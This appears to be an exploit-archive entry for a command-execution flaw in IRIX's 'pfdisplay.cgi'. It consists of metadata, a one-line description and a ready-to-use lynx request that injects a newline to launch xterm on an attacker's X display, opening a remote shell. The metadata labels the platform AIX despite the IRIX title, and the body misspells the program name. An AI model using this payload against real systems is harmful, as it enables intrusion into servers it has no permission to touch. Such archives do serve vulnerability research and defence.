IRIX 6.4 - 'pfdisplay.cgi' Code Execution

Author: J.A. Gutierrez
type: remote
platform: aix
port: 
date_added: 1998-04-07  
date_updated: 2017-11-22  
verified: 1  
codes: OSVDB-82935;OSVDB-134  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19048.txt  

source: https://www.securityfocus.com/bid/64/info

There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.

$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'